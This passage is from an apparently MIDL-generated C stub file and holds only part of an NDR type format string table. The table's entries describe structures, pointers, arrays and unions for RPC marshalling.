/* 5848 */	NdrFcShort( 0xffba ),	/* Offset= -70 (5778) */
/* 5850 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5852 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 5854 */	NdrFcShort( 0x8 ),	/* 8 */
/* 5856 */	NdrFcShort( 0xffd2 ),	/* Offset= -46 (5810) */
/* 5858 */	NdrFcShort( 0x0 ),	/* Offset= 0 (5858) */
/* 5860 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 5862 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5864 */
			0x12, 0x0,	/* FC_UP */
/* 5866 */	NdrFcShort( 0x60 ),	/* Offset= 96 (5962) */
/* 5868 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 5870 */	NdrFcShort( 0x68 ),	/* 104 */
/* 5872 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5874 */	NdrFcShort( 0x1e ),	/* Offset= 30 (5904) */
/* 5876 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 5878 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 5880 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 5882 */	0x0,		/* 0 */
			NdrFcShort( 0xfc03 ),	/* Offset= -1021 (4862) */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 5886 */	0x0,		/* 0 */
			NdrFcShort( 0xfbff ),	/* Offset= -1025 (4862) */
			0x8,		/* FC_LONG */
/* 5890 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5892 */	NdrFcShort( 0xfbfa ),	/* Offset= -1030 (4862) */
/* 5894 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5896 */	NdrFcShort( 0xe904 ),	/* Offset= -5884 (12) */
/* 5898 */	0x40,		/* FC_STRUCTPAD4 */
			0xb,		/* FC_HYPER */
/* 5900 */	0xb,		/* FC_HYPER */
			0x36,		/* FC_POINTER */
/* 5902 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5904 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5906 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5908 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5910 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5912 */
			0x14, 0x20,	/* FC_FP [maybenull_sizeis] */
/* 5914 */	NdrFcShort( 0xfe72 ),	/* Offset= -398 (5516) */
/* 5916 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5918 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5920 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x7,		/* 7 */
/* 5922 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5924 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 5926 */	NdrFcShort( 0xfff8 ),	/* -8 */
/* 5928 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 5930 */	0x0 ,
			0x0,		/* 0 */
/* 5932 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5936 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5940 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 5944 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 5946 */	0x0 ,
			0x0,		/* 0 */
/* 5948 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5952 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5956 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5958 */	NdrFcShort( 0xffa6 ),	/* Offset= -90 (5868) */
/* 5960 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5962 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 5964 */	NdrFcShort( 0x8 ),	/* 8 */
/* 5966 */	NdrFcShort( 0xffd2 ),	/* Offset= -46 (5920) */
/* 5968 */	NdrFcShort( 0x0 ),	/* Offset= 0 (5968) */
/* 5970 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 5972 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5974 */
			0x12, 0x0,	/* FC_UP */
/* 5976 */	NdrFcShort( 0x44 ),	/* Offset= 68 (6044) */
/* 5978 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 5980 */	NdrFcShort( 0x30 ),	/* 48 */
/* 5982 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5984 */	NdrFcShort( 0xe ),	/* Offset= 14 (5998) */
/* 5986 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 5988 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 5990 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 5992 */	0x40,		/* FC_STRUCTPAD4 */
			0xb,		/* FC_HYPER */
/* 5994 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 5996 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5998 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 6000 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 6002 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x7,		/* 7 */
/* 6004 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6006 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 6008 */	NdrFcShort( 0xfff8 ),	/* -8 */
/* 6010 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 6012 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 6014 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6018 */	NdrFcLong( 0x100 ),	/* 256 */
/* 6022 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 6026 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 6028 */	0x0 ,
			0x0,		/* 0 */
/* 6030 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6034 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6038 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 6040 */	NdrFcShort( 0xffc2 ),	/* Offset= -62 (5978) */
/* 6042 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 6044 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 6046 */	NdrFcShort( 0x8 ),	/* 8 */
/* 6048 */	NdrFcShort( 0xffd2 ),	/* Offset= -46 (6002) */
/* 6050 */	NdrFcShort( 0x0 ),	/* Offset= 0 (6050) */
/* 6052 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 6054 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 6056 */
			0x12, 0x0,	/* FC_UP */
/* 6058 */	NdrFcShort( 0xea44 ),	/* Offset= -5564 (494) */
/* 6060 */
			0x12, 0x0,	/* FC_UP */
/* 6062 */	NdrFcShort( 0x2c ),	/* Offset= 44 (6106) */
/* 6064 */
			0x15,		/* FC_STRUCT */
			0x7,		/* 7 */
/* 6066 */	NdrFcShort( 0x30 ),	/* 48 */
/* 6068 */	0xb,		/* FC_HYPER */
			0x8,		/* FC_LONG */
/* 6070 */	0x8,		/* FC_LONG */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 6072 */	0x0,		/* 0 */
			NdrFcShort( 0xe853 ),	/* Offset= -6061 (12) */
			0xb,		/* FC_HYPER */
/* 6076 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 6078 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 6080 */
			0x1b,		/* FC_CARRAY */
			0x7,		/* 7 */
/* 6082 */	NdrFcShort( 0x30 ),	/* 48 */
/* 6084 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 6086 */	NdrFcShort( 0xfff8 ),	/* -8 */
/* 6088 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 6090 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 6092 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6096 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 6100 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 6102 */	NdrFcShort( 0xffda ),	/* Offset= -38 (6064) */
/* 6104 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 6106 */
			0x17,		/* FC_CSTRUCT */
			0x7,		/* 7 */
/* 6108 */	NdrFcShort( 0x8 ),	/* 8 */
/* 6110 */	NdrFcShort( 0xffe2 ),	/* Offset= -30 (6080) */
/* 6112 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 6114 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 6116 */
			0x11, 0x0,	/* FC_RP */
/* 6118 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6120) */
/* 6120 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 6122 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 6124 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 6126 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 6128 */	0x0 ,
			0x0,		/* 0 */
/* 6130 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6134 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6138 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6140) */
/* 6140 */	NdrFcShort( 0x60 ),	/* 96 */
/* 6142 */	NdrFcShort( 0x1 ),	/* 1 */
/* 6144 */	NdrFcLong( 0x1 ),	/* 1 */
/* 6148 */	NdrFcShort( 0x46 ),	/* Offset= 70 (6218) */
/* 6150 */	NdrFcShort( 0xffff ),	/* Offset= -1 (6149) */
/* 6152 */
			0x1b,		/* FC_CARRAY */
			0x1,		/* 1 */
/* 6154 */	NdrFcShort( 0x2 ),	/* 2 */
/* 6156 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 6158 */	NdrFcShort( 0x20 ),	/* 32 */
/* 6160 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 6162 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 6164 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6168 */	NdrFcLong( 0x100 ),	/* 256 */
/* 6172 */	0x5,		/* FC_WCHAR */
			0x5b,		/* FC_END */
/* 6174 */
			0x1b,		/* FC_CARRAY */
			0x1,		/* 1 */
/* 6176 */	NdrFcShort( 0x2 ),	/* 2 */
/* 6178 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 6180 */	NdrFcShort( 0x30 ),	/* 48 */
/* 6182 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 6184 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 6186 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6190 */	NdrFcLong( 0x100 ),	/* 256 */
/* 6194 */	0x5,		/* FC_WCHAR */
			0x5b,		/* FC_END */
/* 6196 */
			0x1b,		/* FC_CARRAY */
			0x1,		/* 1 */
/* 6198 */	NdrFcShort( 0x2 ),	/* 2 */
/* 6200 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 6202 */	NdrFcShort( 0x40 ),	/* 64 */
/* 6204 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 6206 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 6208 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6212 */	NdrFcLong( 0x100 ),	/* 256 */
/* 6216 */	0x5,		/* FC_WCHAR */
			0x5b,		/* FC_END */
/* 6218 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 6220 */	NdrFcShort( 0x60 ),	/* 96 */
/* 6222 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6224 */	NdrFcShort( 0x14 ),	/* Offset= 20 (6244) */
/* 6226 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 6228 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 6230 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 6232 */	0x40,		/* FC_STRUCTPAD4 */
			0x36,		/* FC_POINTER */
/* 6234 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 6236 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 6238 */	0x40,		/* FC_STRUCTPAD4 */
			0x36,		/* FC_POINTER */
/* 6240 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 6242 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 6244 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 6246 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 6248 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 6250 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 6252 */
			0x14, 0x8,	/* FC_FP [simple_pointer] */
/* 6254 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 6256 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 6258 */	NdrFcShort( 0xff96 ),	/* Offset= -106 (6152) */
/* 6260 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 6262 */	NdrFcShort( 0xffa8 ),	/* Offset= -88 (6174) */
/* 6264 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 6266 */	NdrFcShort( 0xffba ),	/* Offset= -70 (6196) */
/* 6268 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 6270 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 6272 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 6274 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 6276 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 6278 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6280) */
/* 6280 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 6282 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 6284 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 6286 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 6288 */	0x0 ,
			0x0,		/* 0 */
/* 6290 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6294 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6298 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6300) */
/* 6300 */	NdrFcShort( 0x4 ),	/* 4 */
/* 6302 */	NdrFcShort( 0x1 ),	/* 1 */
/* 6304 */	NdrFcLong( 0x1 ),	/* 1 */
/* 6308 */	NdrFcShort( 0xf4c4 ),	/* Offset= -2876 (3432) */
/* 6310 */	NdrFcShort( 0xffff ),	/* Offset= -1 (6309) */
/* 6312 */
			0x11, 0x0,	/* FC_RP */
/* 6314 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6316) */
/* 6316 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 6318 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 6320 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 6322 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 6324 */	0x0 ,
			0x0,		/* 0 */
/* 6326 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6330 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6334 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6336) */
/* 6336 */	NdrFcShort( 0x10 ),	/* 16 */
/* 6338 */	NdrFcShort( 0x1 ),	/* 1 */
/* 6340 */	NdrFcLong( 0x1 ),	/* 1 */
/* 6344 */	NdrFcShort( 0x2e ),	/* Offset= 46 (6390) */
/* 6346 */	NdrFcShort( 0xffff ),	/* Offset= -1 (6345) */
/* 6348 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 6350 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6352 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 6354 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6356 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 6358 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 6360 */	NdrFcLong( 0x1 ),	/* 1 */
/* 6364 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 6368 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 6372 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 6374 */	0x0 ,
			0x0,		/* 0 */
/* 6376 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6380 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6384 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 6386 */	NdrFcShort( 0xf05e ),	/* Offset= -4002 (2384) */
/* 6388 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 6390 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 6392 */	NdrFcShort( 0x10 ),	/* 16 */
/* 6394 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6396 */	NdrFcShort( 0x6 ),	/* Offset= 6 (6402) */
/* 6398 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 6400 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 6402 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 6404 */	NdrFcShort( 0xffc8 ),	/* Offset= -56 (6348) */
/* 6406 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 6408 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6410) */
/* 6410 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 6412 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 6414 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 6416 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 6418 */	0x0 ,
			0x0,		/* 0 */
/* 6420 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6424 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6428 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6430) */
/* 6430 */	NdrFcShort( 0x10 ),	/* 16 */
/* 6432 */	NdrFcShort( 0x1 ),	/* 1 */
/* 6434 */	NdrFcLong( 0x1 ),	/* 1 */
/* 6438 */	NdrFcShort( 0x2e ),	/* Offset= 46 (6484) */
/* 6440 */	NdrFcShort( 0xffff ),	/* Offset= -1 (6439) */
/* 6442 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 6444 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6446 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 6448 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6450 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 6452 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 6454 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6458 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 6462 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 6466 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 6468 */	0x0 ,
			0x0,		/* 0 */
/* 6470 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6474 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6478 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 6480 */	NdrFcShort( 0xf0a8 ),	/* Offset= -3928 (2552) */
/* 6482 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 6484 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 6486 */	NdrFcShort( 0x10 ),	/* 16 */
/* 6488 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6490 */	NdrFcShort( 0x6 ),	/* Offset= 6 (6496) */
/* 6492 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 6494 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 6496 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 6498 */	NdrFcShort( 0xffc8 ),	/* Offset= -56 (6442) */
/* 6500 */
			0x11, 0x0,	/* FC_RP */
/* 6502 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6504) */
/* 6504 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 6506 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 6508 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 6510 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 6512 */	0x0 ,
			0x0,		/* 0 */
/* 6514 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6518 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6522 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6524) */
/* 6524 */	NdrFcShort( 0x20 ),	/* 32 */
/* 6526 */	NdrFcShort( 0x1 ),	/* 1 */
/* 6528 */	NdrFcLong( 0x1 ),	/* 1 */
/* 6532 */	NdrFcShort( 0x4 ),	/* Offset= 4 (6536) */
/* 6534 */	NdrFcShort( 0xffff ),	/* Offset= -1 (6533) */
/* 6536 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 6538 */	NdrFcShort( 0x20 ),	/* 32 */
/* 6540 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6542 */	NdrFcShort( 0xa ),	/* Offset= 10 (6552) */
/* 6544 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 6546 */	0x0,		/* 0 */
			NdrFcShort( 0xe679 ),	/* Offset= -6535 (12) */
			0x8,		/* FC_LONG */
/* 6550 */	0x40,		/* FC_STRUCTPAD4 */
			0x5b,		/* FC_END */
/* 6552 */
			0x11, 0x0,	/* FC_RP */
/* 6554 */	NdrFcShort( 0xe708 ),	/* Offset= -6392 (162) */
/* 6556 */
			0x11, 0x0,	/* FC_RP */
/* 6558 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6560) */
/* 6560 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 6562 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 6564 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 6566 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 6568 */	0x0 ,
			0x0,		/* 0 */
/* 6570 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6574 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6578 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6580) */
/* 6580 */	NdrFcShort( 0x38 ),	/* 56 */
/* 6582 */	NdrFcShort( 0x1 ),	/* 1 */
/* 6584 */	NdrFcLong( 0x1 ),	/* 1 */
/* 6588 */	NdrFcShort( 0xa ),	/* Offset= 10 (6598) */
/* 6590 */	NdrFcShort( 0xffff ),	/* Offset= -1 (6589) */
/* 6592 */
			0x1d,		/* FC_SMFARRAY */
			0x0,		/* 0 */
/* 6594 */	NdrFcShort( 0x10 ),	/* 16 */
/* 6596 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 6598 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 6600 */	NdrFcShort( 0x38 ),	/* 56 */
/* 6602 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6604 */	NdrFcShort( 0x10 ),	/* Offset= 16 (6620) */
/* 6606 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 6608 */	NdrFcShort( 0xe63c ),	/* Offset= -6596 (12) */
/* 6610 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 6612 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 6614 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 6616 */	NdrFcShort( 0xffe8 ),	/* Offset= -24 (6592) */
/* 6618 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 6620 */
			0x12, 0x0,	/* FC_UP */
/* 6622 */	NdrFcShort( 0xe6c4 ),	/* Offset= -6460 (162) */
/* 6624 */
			0x12, 0x0,	/* FC_UP */
/* 6626 */	NdrFcShort( 0xe80c ),	/* Offset= -6132 (494) */
/* 6628 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 6630 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6632) */
/* 6632 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 6634 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 6636 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 6638 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 6640 */	0x0 ,
			0x0,		/* 0 */
/* 6642 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6646 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6650 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6652) */
/* 6652 */	NdrFcShort( 0x10 ),	/* 16 */
/* 6654 */	NdrFcShort( 0x1 ),	/* 1 */
/* 6656 */	NdrFcLong( 0x1 ),	/* 1 */
/* 6660 */	NdrFcShort( 0x2e ),	/* Offset= 46 (6706) */
/* 6662 */	NdrFcShort( 0xffff ),	/* Offset= -1 (6661) */
/* 6664 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 6666 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6668 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 6670 */	NdrFcShort( 0x4 ),	/* 4 */
/* 6672 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 6674 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 6676 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6680 */	NdrFcLong( 0xa00000 ),	/* 10485760 */
/* 6684 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 6688 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 6690 */	0x0 ,
			0x0,		/* 0 */
/* 6692 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6696 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6700 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 6702 */	NdrFcShort( 0xe5de ),	/* Offset= -6690 (12) */
/* 6704 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 6706 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 6708 */	NdrFcShort( 0x10 ),	/* 16 */
/* 6710 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6712 */	NdrFcShort( 0x6 ),	/* Offset= 6 (6718) */
/* 6714 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 6716 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 6718 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 6720 */	NdrFcShort( 0xffc8 ),	/* Offset= -56 (6664) */
/* 6722 */
			0x11, 0x0,	/* FC_RP */
/* 6724 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6726) */
/* 6726 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 6728 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 6730 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 6732 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 6734 */	0x0 ,
			0x0,		/* 0 */
/* 6736 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6740 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6744 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6746) */
/* 6746 */	NdrFcShort( 0x20 ),	/* 32 */
/* 6748 */	NdrFcShort( 0x1 ),	/* 1 */
/* 6750 */	NdrFcLong( 0x1 ),	/* 1 */
/* 6754 */	NdrFcShort( 0x2e ),	/* Offset= 46 (6800) */
/* 6756 */	NdrFcShort( 0xffff ),	/* Offset= -1 (6755) */
/* 6758 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
